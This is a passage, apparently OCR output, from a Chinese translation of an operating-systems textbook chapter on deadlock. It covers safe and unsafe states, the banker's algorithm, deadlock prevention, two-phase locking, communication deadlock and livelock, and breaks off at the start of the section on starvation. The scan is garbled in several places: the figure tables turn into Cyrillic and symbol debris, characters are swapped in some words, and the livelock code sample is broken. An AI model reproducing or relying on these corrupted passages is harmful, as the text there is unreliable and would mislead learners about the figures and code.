现在 A 可 以 获得 它 所 需要 的 6 个 资源 实例 ， 并 且 完 成 。 这 样 系统 通过 仔细 的 调度 ， 就 能 够 避免 死 锁 ， 所 以 
图 6-9a 的 状态 是 安全 的 。 

现在 假设 初始 状态 如 图 6-10a 所 示 。 但 这 次 A 请 求 并 得 到 另 一 个 资源 ， 如 图 6-10b 所 示 。 我 们 还 能 找到 
一 个 序列 来 完成 所 有 工作 吗 ? 我 们 来 试 一 试 。 调 度 程序 可 以 运行 B， 直 到 B 获 得 所 需 资源 ， 如 图 6-10c 所 示 。 

最 终 ， 进 程 B 完 成 ， 状 态 如 图 6-10d 所 示 ， 此 时 进入 困境 了 。 只 有 4 个 资源 实例 空 亲 ， 并 且 所 有 活动 
进程 都 需要 5 个 资源 实例 。 任 何 分 配 资源 实例 的 序列 都 无 法 保证 工作 的 完成 。 于 是 ， 从 图 6-10a 到 图 6-10b 
的 分 配方 案 ， 从 安全 状态 进入 到 了 不 安全 状态 。 从 图 6-10c 的 状态 出 发 运行 进程 A 或 C 也 都 不 行 。 回 过 头 
来 再 看 ，A 的 请 求 不 应 该 满足 。 

值得 注意 的 是 ， 不 安全 状态 并 不 是 死 锁 。 从 图 6-10b 出 发 ， 系 统 能 运行 一 段 时 间 。 实 际 上 ， 甚 至 有 
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一 个 进程 能 够 完成 。 而 且 ， 在 A 请 求 其 他 资源 实例 前 ，A 可 能 先 释放 一 个 资源 实例 ， 这 就 可 以 让 C 先 完成 ， 
从 而 避免 了 死 锁 。 因 而 ， 安 全 状态 和 不 安全 状态 的 区 别 是 : 从 安全 状态 出 发 ， 系 统 能 够 保证 所 有 进程 都 
能 完成 ， 而 从 不 安全 状态 出 发 ， 就 没有 这 样 的 保证 。 


已 有 最 大 已 有 最 大 已 有 最 大 已 有 最 大 

数量 需求 数量 需求 数量 需求 数量 需求 
^{[э ә) 四 西西 [Т] 9 
в[2 [4 Ге [2 [а в [а [4 el—|— 
с[2[7 с[2 [52 | с|[2 [2 с[2 [5 
ZA: 3 ZN: 2 ZA: 0 ZW: 4 


a) b) 5] 9 
图 6-10 说 明 b 中 的 状态 为 不 安全 状态 


6.5.3 单个 资源 的 银行 家 算法 

Dijkstra (1965) 提出 了 一 种 能 够 避免 死 锁 的 调度 算法 ， 称 为 银行 家 算法 (banker's algorithm)， 这 
是 6.4.1 节 中 给 出 的 死 锁 检测 算法 的 扩展 。 该 模型 基于 一 个 小 城镇 的 银行 家 ， 他 向 一 群 客户 分 别 承诺 了 一 
定 的 贷款 额度 。 算 法 要 做 的 是 判断 对 请 求 的 满足 是 否 会 导致 进入 不 安全 状态 。 如 果 是 ， 就 拒绝 请 求 ， 如 
果 满 足 请 求 后 系统 仍然 是 安全 的 ， 就 予以 分 配 。 在 图 6-11a 中 我 们 看 到 4 个 客户 A、B、C、D， 每 个 客户 
都 被 授予 一 定数 量 的 贷款 单位 (比如 1 单位 是 1 千 美元 )， 银 行家 知道 不 可 能 所 有 客户 同时 都 需要 最 大 贷 
款额 ， 所 以 他 只 保留 10 个 单位 而 不 是 22 个 单位 的 资金 来 为 客户 服务 。 这 里 将 客户 比 作 进 程 ， 贷 款 单位 比 
作 资 源 ， 银 行家 比 作 操作 系统 。 


图 6-11 三 种 资源 分 配 状态 : a) 安全 ，b) 安全 ，c) 不 安全 


客户 们 各 自 做 自己 的 生意 ， 在 某 些 时 刻 需要 贷款 (相当 于 请 求 资源 )。 在 某 一 时 刻 ， 具 体 情况 如 图 
6-11b 所 示 。 这 个 状态 是 安全 的 ， 由 于 保留 着 2 个 单位 ， 银 行家 能 够 拖延 除了 C 以 外 的 其 他 请 求 。 因 而 可 
以 让 C 先 完成 ， 然 后 释放 C 所 占 的 4 个 单位 资源 。 有 了 这 4 个 单位 资源 ， 银 行家 就 可 以 给 D 或 B 分 配 所 需 的 
贷款 单位 ， 以 此 类 推 。 

考 虚假 如 向 B 提 供 了 另 一 个 他 所 请 求 的 贷款 单位 ， 如 图 6-11b 所 示 ， 那 么 我 们 就 有 如 图 6-11c 所 示 的 
状态 ， 该 状态 是 不 安全 的 。 如 果 忽然 所 有 的 客户 者 请求 最 大 的 限额 ， 而 银行 家 无 法 满足 其 中 任何 一 个 的 
要 求 ， 那 么 就 会 产生 死 锁 。 不 安全 状态 并 不 一 定 引起 死 锁 ， 由 于 客户 不 一 定 需要 其 最 大 贷款 额度 ， 但 银 
行家 不 敢 抱 这 种 侥幸 心理 。 

银行 家 算法 就 是 对 每 一 个 请 求 进行 检查 ， 检 查 如 果 满 足 这 一 请 求 是 否 会 达到 安全 状态 。 若 是 ， 那 么 
就 满足 该 请 求 ， 若 否 ， 那 么 就 推迟 对 这 一 请 求 的 满足 。 为 了 看 状态 是 否 安全 ， 银 行家 看 他 是 否 有 足够 的 
资源 满足 某 一 个 客户 。 如 果 可 以 ， 那 么 这 笔 投资 认为 是 能 够 收回 的 ， 并 且 接 着 检查 最 接近 最 大 限额 的 一 
个 客户 ， 以 此 类 推 。 如 果 所 有 投资 最 终 都 被 收回 ， 那 么 该 状态 是 安全 的 ， 最 初 的 请 求 可 以 批准 。 

654 多 个 资源 的 银行 家 算法 


可 以 把 银行 家 算法 进行 推广 以 处 理 多 个 资源 。 图 6-12 说 明了 多 个 资源 的 银行 家 算法 如 何 工作 。 
在 图 6-12 中 我 们 看 到 两 个 矩阵 。 左 边 的 矩阵 显示 出 为 5 个 进程 分 别 已 分 配 的 各 种 资源 数 ， 右 边 的 矩 
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各 进程 在 执行 前 给 出 其 所 需 的 全 部 资源 量 ， 所 以 
在 系统 的 每 一 步 中 都 可 以 计算 出 右边 的 矩阵 。 

图 6-12 最 右边 的 三 个 向 量 分 别 表 示 现 有 资源 
E、 已 分 配 资源 P 和 可 用 资源 4。 由 E 可 知 系统 中 
共有 6 台 磁带 机 、3 台 绘图 仪 、4 台 打印 机 和 2 人 台 
CD-ROM 驱 动 器 。 由 P 可 知 当前 已 分 配 了 5 台 破 
带 机 、3 台 绘图 仪 、2 台 打印 机 和 2 台 CD-ROM 驱 
动 器 。 该 向 量 可 通过 将 左边 矩阵 的 各 列 相 加 获得 ， 
可 用 资源 向 量 可 通过 从 现 有 资源 中 减 去 已 分 配 资 已 分 配 资源 仍然 需要 的 资源 
源 获得 。 图 6-12 多 个 资源 的 银行 家 算法 

检查 一 个 状态 是 否 安全 的 算法 如 下 : 

1) 查找 右边 矩阵 中 是 否 有 一 行 ， 其 没有 被 满足 的 资源 数 均 小 于 或 等 于 4。 如 果 不 存 在 这 样 的 行 ， 那 
么 系统 将 会 死 锁 ， 因 为 任何 进程 都 无 法 运行 结束 (假定 进程 会 一 直 占 有 资源 直到 它们 终止 为 止 ) 。 

2) 假若 找到 这 样 一 行 ， 那 么 可 以 假设 它 获得 所 需 的 资源 并 运行 结束 ， 将 该 进程 标记 为 终止 ， 并 将 其 
资源 加 到 向 量 4 上 。 

3) 重复 以 上 两 步 ， 或 者 直到 所 有 的 进程 都 标记 为 终止 ， 其 初始 状态 是 安全 的 ， 或 者 所 有 进程 的 资源 
需求 都 得 不 到 满足 ， 此 时 就 是 发 生 了 死 锁 。 

如 果 在 第 1 步 中 同时 有 若干 进程 均 符合 条 件 ， 那 么 不 管 挑选 哪 一 个 运行 都 没有 关系 ， 因 为 可 用 资源 
或 者 会 增多 ， 或 者 至 少 保持 不 变 。 

图 6-12 中 所 示 的 状态 是 安全 的 ， 若 进程 B 现 在 再 请 求 一 台 打 印 机， 可 以 满足 它 的 请 求 ， 因 为 所 得 系 
统 状态 仍然 是 安全 的 (进程 D 可 以 结束 ， 然 后 是 A 或 E 结 束 ， 剩 下 的 进程 相继 结束 )。 

假设 进程 B 获 得 两 台 可 用 打印 机 中 的 一 台 以 后 ，E 试 图 获得 最 后 一 台 打 印 机 ， 假 若 分 配给 E， 可 用 资 
源 向 量 会 减 到 (1 0 0 0)， 这 时 会 引起 死 锁 。 显 然 E 的 请 求 不 能 立即 满足 ， 必 须 延 迟 一 段 时 间 。 

银行 家 算法 最 早 由 Dijkstra 于 1965 年 发 表 。 从 那 之 后 几乎 每 本 操作 系统 的 专著 都 详细 地 描述 它 ， 很 
多 论文 的 内 容 也 围绕 该 算法 讨论 了 它 的 不 同方 面 。 但 很 少 有 作者 指出 该 算法 虽然 很 有 意义 但 缺乏 实用 价 
值 ， 因 为 很 少 有 进程 能 够 在 运行 前 就 知道 其 所 需 资源 的 最 大 值 。 而 且 进 程 数 也 不 是 固定 的 ， 往 往 在 不 断 
地 变化 (如 新 用 户 的 登录 或 退出 )， 况 且 原 本 可 用 的 资源 也 可 能 突然 间 变 成 不 可 用 (如 磁带 机 可 能 会 坏 
掉 )。 因 此 ， 在 实际 中 ， 如 果 有 ， 也 只 有 极 少 的 系统 使 用 银行 家 算法 来 避免 死 锁 。 


6.6 死 锁 预 防 

通过 前 面 的 学 习 我 们 知道 ， 死 锁 避 免 从 本 质 上 来 说 是 不 可 能 的 ， 因 为 它 需要 获知 未 来 的 请 求 ， 而 这 
些 请 求 是 不 可 知 的 。 那 么 实际 的 系统 又 是 如 何 避 免 死 锁 的 呢 ? 我 们 回顾 Coffman 等 人 (1971) 所 述 的 四 
个 条 件 ， 看 是 否 能 发 现 线索 。 如 果 能 够 保证 四 个 条 件 中 至 少 有 一 个 不 成 立 ， 那 么 死 锁 将 不 会 产生 
(Havender, 1968), 


6.61 破坏 互 斥 条 件 

先 考虑 破坏 互 斥 使 用 条 件 。 如 果 资 源 不 被 一 个 进程 所 独占 ， 那 么 死 锁 肯 定 不 会 产生 。 当 然 ， 克 许 两 
个 进程 同时 使 用 打印 机 会 造成 混乱 ， 通 过 采用 假 脱 机 打印 机 (spooling printer) 技术 可 以 允许 若干 个 进 
程 同时 产生 输出 。 该 模型 中 惟一 真正 请 求 使 用 物理 打印 机 的 进程 是 打印 机 守护 进程 ， 由 于 守护 进程 决 不 
会 请 求 别 的 资源 ， 所 以 不 会 因 打 印 机 而 产生 死 锁 。 

假设 守护 进程 被 设计 为 在 所 有 输出 进入 假 脱 机 之 前 就 开始 打印 ， 那 么 如 果 一 个 输出 进程 在 头 一 轮 打印 
之 后 决定 等 待 几 个 小 时 ， 打 印 机 就 可 能 空置 。 为 了 避免 这 种 现象 ， 一 般 将 守护 进程 设计 成 在 完整 的 输出 文 
件 就 绪 后 才 开 始 打 印 。 例 如 ， 若 两 个 进程 分 别 占用 了 可 用 的 假 脱 机 磁盘 空间 的 一 半 用 于 输出 ， 而 任何 一 个 
也 没有 能 够 完成 输出 ， 那 么 会 怎样 ? 在 这 种 情形 下 ， 就 会 有 两 个 进程 ， 其 中 每 一 个 都 完成 了 部 分 的 输出 ， 
但 不 是 它们 的 全 部 输出 ， 于 是 无 法 继续 进行 下 去 。 没 有 一 个 进程 能 够 完成 ， 结 果 在 磁盘 上 出 现 了 死 锁 。 


Е = (6342) 
Р = (5322) 
А = (1020) 


256 #6 Ж% 


不 过 ， 有 一 个 小 思路 是 经 常 可 适用 的 。 屠 就是， 避免 分 配 那些 不 是 绝对 必需 的 资源 ， 尽 量 做 到 尽 可 
能 少 的 进程 可 以 真正 请 求 资源 。 
6.6.2 破坏 占有 和 等 待 条 件 

Coffman 等 表述 的 第 二 个 条 件 似乎 更 有 希望 。 只 要 禁止 已 持 有 资源 的 进程 再 等 待 其 他 资源 便 可 以 消 
除 死 锁 。 一 种 实现 方法 是 规定 所 有 进程 在 开始 执行 前 请 求 所 需 的 全 部 资源 。 如 果 所 需 的 全 部 资源 可 用 
那么 就 将 它们 分 配给 这 个 进程 ， 于 是 该 进程 肯定 能 够 运行 结束 。 如 果 有 一 个 或 多 个 资源 正 被 使 用 ， 那 么 
就 不 进行 分 配 ， 进 程 等 待 。 

这 种 方法 的 一 个 直接 问题 是 很 多 进程 直到 运行 时 才 知道 它 需 要 多 少 资源 。 实 际 上 ， 如 果 进 程 能 够 知 
道 它 需要 多 少 资源 ， 就 可 以 使 用 银行 家 算法 。 另 一 个 问题 是 这 种 方法 的 资源 利用 率 不 是 最 优 的 。 例 如 
有 一 个 进程 先 从 输入 磁带 上 读 取 数据 ， 进 行 一 小 时 的 分 析 ， 最 后 会 写 到 输出 磁带 上 ， 同 时 会 在 绘图 仪 上 
绘 出 。 如 果 所 有 资源 都 必须 提前 请 求 ， 这 个 进程 就 会 把 输出 磁带 机 和 绘图 仪 控制 住 一 小 时 。 

不 过 ， 一些 大 型 机 批 处 理 系统 要 求 用 户 在 所 提交 的 作业 的 第 一 行列 出 它们 需要 多 少 资源 。 然 后 ， 系 
统 立 即 分 配 所 需 的 全 部 资源 ， 并 且 直 到 作业 完成 才 回 收 资源 。 虽 然 这 加 重 了 编程 人 员 的 负担 ， 也 造成 了 
资源 的 浪费 ， 但 这 的 确 防止 了 死 镇 

另 一 种 破坏 占有 和 等 待 条 件 的 略 有 不 同 的 方案 是 ， 要 求 当 一 个 进程 请 求 资源 时 ， 先 暂时 释放 其 当前 
占用 的 所 有 资源 ， 然 后 再 尝试 一 次 获得 所 需 的 全 部 资源 。 


6.6.3 破坏 不 可 抢占 条 件 

破坏 第 三 个 条 件 (不 可 抢占 ) 也 是 可 能 的 。 假 若 一 个 进程 已 分 配 到 一 台 打 印 机 ， 且 正在 进行 打印 输 
出 ， 如 果 由 于 它 需要 的 绘图 仪 无 法 获得 而 强制 性 地 把 它 占有 的 打印 机 抢占 掉 ， 会 引起 一 片 混乱 。 但 是 
一 些 资源 可 以 通过 虚拟 化 的 方式 来 避免 发 生 这 样 的 情况 。 假 脱 机 打印 机 向 磁盘 输出 ， 并 且 只 允许 打印 机 
守护 进程 访问 真正 的 物理 打印 机 ， 这 种 方式 可 以 消除 涉及 打印 机 的 死 锁 ， 然 而 却 可 能 带 来 由 磁盘 空间 导 
致 的 死 锁 。 但 是 对 于 大 容量 磁盘 ， 要 消耗 完 所 有 的 磁盘 空间 一 般 是 不 可 能 的 。 

然而 ， 并 不 是 所 有 的 资源 都 可 以 进行 类 似 的 虚拟 化 。 例 如 ， 数 据 库 中 的 记录 或 者 操作 系统 中 的 表 都 
必须 被 锁定 ， 因 此 存在 出 现 死 锁 的 可 能 。 
6.6.4 破坏 环 路 等 待 条 件 

现在 只 剩 下 一 个 条 件 了 。 消 除 环 路 等 待 有 几 种 方法 。 一 种 是 保证 每 一 个 进程 在 任何 时 刻 只 能 占用 一 
个 资源 ， 如 果 要 请 求 另外 一 个 资源 ， 它 必须 先 释 放 第 一 个 资源 。 但 假若 进程 正在 把 一 个 大 文件 从 磁带 机 


上 读 入 并 送 到 打印 机 打印 ， 那 么 这 种 限制 是 不 可 接受 的 。 ИТТЕ О 
| | 
b) 


另 一 种 避免 出 现 环 路 等 待 的 方法 是 将 所 有 资源 统一 编号 ， | элт. 
各 图 6-134 所 示 。 现 在 的 规则 是 ,进程 可 以 在 任何 时 刻 提出 资 | 58 
源 请 求 ， 但 是 所 有 请 求 必须 按照 资源 编号 的 顺序 (升序 ) 提出 。 хора 
进程 可 以 先 请 求 打印 机 后 请 求 磁带 机 ， 但 不 可 以 先 请 求 给 图 仪 > 
后 请 求 打印 机 。 

若 按 此 规则 ， 资 源 分 配 图 中 肯定 不 会 出 现 环 。 让 我 们 看 8613 人 对 资源 排序 编号 + 
看 在 有 两 个 进程 的 情形 下 为 何 可 行 ， 参 看 图 6-13b。 只 有 在 A у 一 个 资源 分 配 图 
请 求 资源 ) 且 B 请 求 资源 :的 情况 下 会 产生 死 锁 。 假 设 ; 和 /是 不 同 的 资源 ， 它 们 会 具有 不 同 的 编号 。 若 i>j， 
那么 A 不 允许 请 求 j， 因 为 这 个 编号 小 于 A 已 有 资源 的 编号 ， 若 i<j， 那 么 B 不 允许 请 求 i， 因 为 这 个 编号 小 
于 B 已 有 资源 的 编号 。 不 论 哪 种 情况 都 不 可 能 产生 死 锁 。 

对 于 多 于 两 个 进程 的 情况 ， 同 样 的 逻辑 依然 成 立 。 在 任何 时 候 ， 总 有 一个 已 分 配 的 资源 是 编号 最 高 
的 。 占 用 该 资源 的 进程 不 可 能 请 求 其 他 已 分 配 的 各 种 资源 。 它 或 者 会 执行 完毕 ， 或 者 最 坏 的 情形 是 去 请 
求 编号 更 高 的 资源 ， 而 编号 更 高 的 资源 肯定 是 可 用 的 。 最 终 ， 它 会 结束 并 释放 所 有 资源 ， 这 时 其 他 占有 
最 高 编号 资源 的 进程 也 可 以 执行 完 。 简 言 之 ， 存 在 一 种 所 有 进程 都 可 以 执行 完毕 的 情景 ， 所 以 不 会 产生 
死 锁 。 

该 算法 的 一 个 变种 是 接 弃 必须 按 升序 请 求 资源 的 限制 ， 而 仅仅 要 求 不 允许 进程 请 求 比 当前 所 占有 次 
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源 编号 低 的 资源 。 所 以 ， 若 一 个 进程 起 初 请 求 9 号 和 10 号 资源 ， 而 随后 释放 两 者 ， 那 么 它 实际 上 相当 于 从 


头 开始 ， 所 以 没有 必要 阻止 它 现在 请 求 1 号 资源 。 K | Жат] 
尽管 对 资源 编号 的 方法 消除 了 死 锁 的 问题 ， се TT 
但 几乎 找 不 出 一 种 使 每 个 人 都 满意 的 编号 次 序 。 е заа 
ЗИС ЕЕ ЕЙ, PRIRA, MA асаад кейш 
数据 库 记 录 及 其 他 抽象 资源 时 ， 潜 在 的 资源 及 各 Соке тту до 
ЗЕКЕН 2, ОВА 827 се 
法 根本 无 法 使 用 。 图 6-14 FEMIA 
死 锁 预 防 的 各 种 方法 如 图 6-14 所 示 。 
6.7 其 他 问题 
在 本 市 中 ， 我 们 会 讨论 一 些 和 死 锁 相 关 的 问题 ， 包 括 两 阶段 加 锁 、 通 信 死 锁 、 活 锁 和 人 饥 饭 。 
67.1 两 阶段 加 锁 


虽然 在 一 般 情 况 下 避免 死 锁 和 预防 死 锁 并 不 是 很 有 希望 ， 但 是 在 一 些 特殊 的 应 用 方面 ， 有 很 多 卓越 
的 专用 算法 。 例 如 ， 在 很 多 数据 库 系统 中 ， 一 个 经 常 发 生 的 操作 是 请 求 锁 住 一 些 记 录 ， 然 后 更 新 所 有 镇 
住 的 记录 。 当 同时 有 多 个 进程 运行 时 ， 就 有 出 现 死 锁 的 危险 。 

常用 的 方法 是 两 阶段 加 镇 (two-phase locking)。 在 第 一 阶段 , 进程 试图 对 所 有 所 需 的 记录 进行 加 锁 
一 次 锁 一 个 记录 。 如 果 第 一 阶段 加 锁 成 功 ， 就 开始 第 二 阶段 ， 完 成 更 新 然后 释放 锁 。 在 第 一 阶段 并 没有 
做 实际 的 工作 。 

如 果 在 第 一 阶段 某 个 进程 需要 的 记录 已 经 被 加 锁 ， 那 么 该 进程 释放 它 所 有 加 锁 的 记录 ， 然 后 重新 开 
始 第 一 阶段 。 从 某 种 意义 上 说 ， 这 种 方法 类 似 于 提前 或 者 至 少 是 未 实施 一 些 不 可 逆 的 操作 之 前 请 求 所 有 
资源 。 在 两 阶段 加 锁 的 一 些 版 本 中 ， 如 果 在 第 一 阶段 遇 到 了 已 加 锁 的 记录 ， 并 不 会 释放 锁 然后 重新 开始 
这 就 可 能 产生 死 锁 。 

不 过 ， 在 一 般 意义 下 ， 这 种 策略 并 不 通用 。 例 如 ， 在 实时 系统 和 进程 控制 系统 中 ， 由 于 一 个 进程 缺 
少 一 个 可 用 资源 就 半途 中 断 它 ， 并 重新 开始 该 进程 ， 这 是 不 可 接受 的 。 如 果 一 个 进程 已 经 在 网 络 上 读 写 
消息 、 更 新 文件 或 从 事 任何 不 能 安全 地 重复 做 的 事 ， 那 么 重新 运行 进程 也 是 不 可 接受 的 。 只 有 当 程序 员 
仔细 地 安排 了 程序 ， 使 得 在 第 一 阶段 程序 可 以 在 任意 一 点 停 下 来 ， 并 重新 开始 而 不 会 产生 错误 ， 这 时 这 
个 算法 才 可 行 。 但 很 多 应 用 并 不 能 按 这 种 方式 来 设计 。 


6.7.2 通信 死 锁 

到 目前 为 止 ， 我 们 所 有 的 工作 都 着 眼 于 资源 死 锁 。 一 个 进程 需要 使 用 另外 一 个 进程 拥有 的 资源 ， 因 
此 必须 等 待 直至 该 进程 停止 使 用 这 些 资源 。 有 时 资源 是 硬件 或 者 软件 ， 比 如 说 CD-ROM 驱 动 器 或 者 数据 
库 记 录 ， 但 是 有 时 它们 更 加 抽象 。 在 图 6-2 中 ， 可 以 看 到 当 资源 互 斥 时 发 生 的 资源 死 锁 。 这 比 CD-ROM 
驱动 器 更 抽象 一 点 ， 但 是 在 这 个 例子 中 ， 每 个 进程 都 成 功 调用 一 个 资源 ( 互 斥 锁 之 一 ) 而 且 死 锁 的 进程 
尝试 去 调用 另外 的 资源 ( 另 一 个 互 斥 锁 )。 这 种 情况 是 典型 的 资源 死 锁 。 

然而 ， 正 如 我 们 在 本 章 开始 提 到 的 ， 资 源 死 锁 是 最 普遍 的 一 种 类 型 ， 但 不 是 惟一 的 一 种 。 另 一 种 死 
锁 发 生 在 通信 系统 中 〈 比 如 说 网 络 ) ， 即 两 个 或 两 个 以 上 进程 利用 发 送信 息 来 通信 时 。 一 种 普遍 的 情形 
是 进程 A 向 进程 B 发 送 请 求 信息 ， 然 后 阻塞 直至 B 同 复 。 假 设 请 求 信息 丢失 ，A 将 阻塞 以 等 待 回复 ， 而 B 
会 阻塞 等 待 一 个 向 其 发 送 命令 的 请 求 ， 因 此 发 生死 锁 。 

仅仅 如 此 并 非 经 典 的 资源 死 锁 。A 没 有 占有 B 所 需 的 资源 ， 反 之 亦 然 。 事 实 上 ， 并 没有 完全 可 见 的 
资产。 但是， 根据 标准 的 定义 ， 在 一 系列 进程 中 ， 每 个 进程 因为 等 待 另外 一 个 进程 引发 的 事件 而 产生 阻 
塞 ， 这 就 是 一 种 死 锁 。 相 比 于 更 加 常见 的 资源 死 锁 ， 我 们 把 上 面 这 种 情况 叫做 通信 死 锁 
(communication deadlock) 。 

通信 死 锁 不 能 通过 对 资源 排序 (因为 没有 ) 或 者 通过 仔细 地 安排 调度 来 避免 《因为 任何 时 刻 的 请 求 
都 是 不 被 允许 延迟 的 ) 。 幸 运 的 是 ， 另 外 一 种 技术 通常 可 以 用 来 中 断 通信 死 锁 ， 超时。 在 大 多 数 网 络 通 
信 系统 中 ， 只 要 一 个 信息 被 发 送 至 一 个 特定 的 地 方 ， 并 等 待 其 返回 一 个 预期 的 回复 ， 发 送 者 就 同时 启动 
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计时 器 。 若 计时 器 在 回复 到 达 前 计时 就 停止 了 ， 则 信息 的 发 送 者 可 以 认定 信息 已 经 丢失 ， 并 重新 发 送 
(如 果 需 要 ， 则 一 直 重复 )。 通 过 这 种 方式 ， 可 以 避免 死 锁 。 

当然 ， 如 果 原 始 信息 没有 丢失 ， 而 仅仅 是 回复 延 时 ， 接 收 者 可 能 收 到 两 次 或 者 更 多 次 信息 ， 甚 至 导 
致意 想不到 的 结果 。 想 象 电子 银行 系统 中 包含 付款 说 明 的 信息 。 很 明显 ， 不 应 该 仅仅 因为 网 速 缓慢 或 者 
超时 设 定 太 短 ， 就 重复 (并 执行 ) 多 次 。 应 该 将 通信 规则 一 一 通常 称 为 协议 (protocol) 一 一 设计 为 让 
所 有 事情 都 正确 ， 这 是 一 个 复杂 的 课题 ， 超 出 了 本 书 的 范围 。 对 网 络 协议 感 兴趣 的 读者 可 以 参考 作者 的 
另外 一 本 书 一 一 《Computer Networks》(Tanenbaum，2003) 。 


并 非 所 有 在 通信 系统 或 者 网 络 发 生 的 死 锁 都 是 通信 死 锁 。 资 源 死 锁 也 会 发 生 ， 如 图 6-15 中 的 网 络 。 
这 张 图 是 因特网 的 简化 图 (极其 简化 )。 因 特 网 人 
由 两 类 计算 机 组 成: 主机 和 路 由 器 。 主 机 (host) 
是 一 台 用 户 计算 机 ， 可 以 是 某 人 家 里 的 PC 机 、 ГЕ 
公司 的 个 人 计算 机 ， 也 可 能 是 一 个 共享 服务 器 。 анан (+) 
主机 由 人 来 操作 。 路 由 器 (outer) 是 专用 的 通 
信 计 算 机 ， 将 数据 包 从 源 发 送 至 目的 地 。 每 台 主 | 
机 都 连接 一 个 或 更 多 的 路 由 器 ， 可 以 用 一 条 DSL 
线 、 有 线 电视 连接 、 局 域 网 、 拨 号 线路 、 无 线 网 Ga) 
络 、 光 纤 等 来 连接 。 

当 一 个 数据 包 从 一 个 主机 进入 路 由 器 时 ， A Ny 
它 被 放 和 一 个 缓 站 器 中 ， 然 后 传输 到 另外 一 个 路 гаа 
їй, FASA, ИНӘ. аа НЕН НГ. 86-15, АВЕ ИТВ 
个 组 器 (实际 应 用 中 有 数 以 百 万 计 ， 但 是 并 不 能 改变 潜在 死 锁 的 本 质 ， 只 是 改变 了 它 的 频率 )。 候 设 
路 由 器 A 的 所 有 数据 包 需要 发 送 到 B，B 的 所 有 数据 包 需 要 发 送 到 C，C 的 所 有 数据 包 和 需 要 发 送 到 D， 然 后 
D 的 所 有 数据 包 需 要 发 送 到 A。 那 么 没有 数据 包 可 以 移动 ， 因 为 在 另 一 端 没 有 缓冲 器 。 这 就 是 一 个 典型 
的 资源 死 锁 ， 尽 管 它 发 生 在 通信 系统 中 。 
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ТЕЖИК, ЖЕШ 忙 等 待 》 可 用 于 进入 临界 区 或 存 取 资 源 。 采 用 这 一 策 咯 的 主要 原因 是 ， 相 比 
所 做 的 工作 而 言 ， 互 斥 的 时 间 很 短 而 挂 起 等 待 的 时 间 开销 很 大 考虑 一 个 原 语 ， 通 过 该 原 语 ， 调 用 进程 
测试 一 个 互 斥 信号 旺 ， 然 后 或 者 得 到 访 信 号 量 或 者 返回 失败 信息 。 如 图 2-26 中 的 例子 所 示 。 
现在 假设 有 一 对 进程 使 用 两 种 资源 ， 如 图 


void process_A(void) { 


6-16 所 示 。 每 个 进程 需要 两 种 资源 ， 它 们 利用 轮 enter_region(&resource_1); 
询 原 语 enter_region 去 尝试 取得 必要 的 锁 ， 如 果 尝 Кее кары жаке 
试 失败 ， 则 该 进程 继续 尝试 。 在 图 6-16 中 ， 如 果 leave_region(&resource_2); 
进程 A 先 运行 并 得 到 资源 1， 然 后 进程 2 运行 并 得 ү ттн 1) 
到 资源 2， 以 后 不 管 哪 一 个 进程 运行 ， 都 不 会 有 

任何 进展 ， 但 是 哪 一 个 进程 也 没有 被 阻塞 。 结 果 К разе Га 
是 两 个 进程 总 是 一 再 消耗 完 分 配给 它们 的 CPU 配 enter_region(&resource 1); 
额 ， 但 是 没有 进展 也 没有 阻塞 。 因 此 ， 没 有 出 现 et 
死 锁 现象 (因为 没有 进程 阻塞 )， 但 是 从 现象 上 leave_region(&resource _2); 


看 好 像 死 锁 发 生 了 ， 这 就 是 活 锁 (livelock)。 } 

活 锁 也 经 常 出 人 意料 地 产生 。 在 一 些 系统 
中 ， 进 程 表 中 容纳 的 进程 数 决定 了 系统 允许 的 最 图 6-16 (сете 
大 进程 数量 ， 因 此 进程 表 属 于 有 限 的 资源 。 如 果 由 于 进程 表 满 了 而 导致 一 次 fork 运 行 失败 ， 那 么 一 个 合 
理 的 方法 是 ; 该 程 序 等 竺 一段 随机 长 的 时 间 ， 然 后 再 次 尝试 运行 fork。 

现在 假设 一 个 UNIX 系 统 有 100 个 进程 档 ，10 个 程序 正在 运行 ， 每 个 程序 需要 创建 12 个 〈 子 ) 进程 。 
在 每 个 进程 创建 了 9 个 进程 后 ，10 个 源 进程 和 90 个 新 的 进程 就 已 经 占 满 了 进程 表 。10 个 源 进程 此 时 便 进 
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人 了 死 锁 一 一 不 停 地 进行 分 支 循 环 和 运行 失败 。 发 生 这 种 情况 的 可 能 性 是 极 小 的 ， 但 是 ， 这 是 可 能 发 生 
的 ! 我 们 是 否 应 该 放弃 进程 以 及 fork 调 用 来 消除 这 个 问题 呢 ? 

限制 打开 文件 的 最 大 数量 与 限制 索引 节点 表 的 大 小 的 方式 很 相像 ， 因 此 ， 当 它 被 完全 占用 的 时 候 ， 
也 会 出 现 相似 的 问题 。 硬 盘 上 的 交换 空间 是 另 一 个 有 限 的 资源 。 事 实 上 ， 几 乎 操作 系统 中 的 每 种 表 都 代 
表 了 一 种 有 限 的 资源 。 如 果 有 n 个 进程 ， 每 个 进程 都 申请 了 1/n 的 资源 ， 然 后 每 一 个 又 试图 申请 更 多 的 资 
源 ， 这 种 情况 下 我 们 是 不 是 应 该 禁 掉 所 有 的 呢 ? 也 许 这 不 是 一 个 好 主意 。 

大 多 数 的 操作 系统 (包括 UNIX 和 Windows) 都 忽略 了 一 个 问题 ， 即 比 起 限制 所 有 用 户 去 使 用 一 个 
进程 、 一 个 打开 的 文件 或 任意 一 种 资源 来 说 ， 大 多 数 用 户 可 能 更 愿意 选择 一 次 偶然 的 活 锁 (或 者 甚至 是 
死 锁 ) 。 如 果 这 些 问题 能 够 免费 消除 ， 那 就 不 会 有 争论 。 但 问题 是 代价 非常 高 ， 几乎 都 是 给 进程 加 
上 不 便 的 限制 来 处 理 。 因 此 我 们 面 对 的 问题 是 从 便捷 性 和 正确 性 中 做 出 取舍 ， 以 及 一 系列 关于 哪个 更 重 
要 、 对 谁 更 重要 的 争论 。 

值得 一 提 的 是 ， 一 些 人 对 饥饿 (缺乏 资源 ) 和 死 锁 并 不 作 区 分 ， 因 为 在 两 种 情况 下 都 没有 下 一 步 操 
作 了 。 还 有 些 人 认为 它们 从 根本 上 不 同 ， 因 为 可 以 很 轻易 地 编写 一 个 进程 ， 让 它 做 某 个 操作 n 次 ， 并 且 
如 果 它 们 都 失败 了 ， 再 试 试 其 他 的 就 可 以 了 。 一 个 阻塞 的 进程 就 没有 那样 的 选择 了 。 

674 饥饿 

与 死 锁 和 活 锁 非常 相似 的 一 个 问题 是 饥 饶 (starvation) 。 在 动态 运行 的 系统 中 ， 在 任何 时 刻 都 可 能 
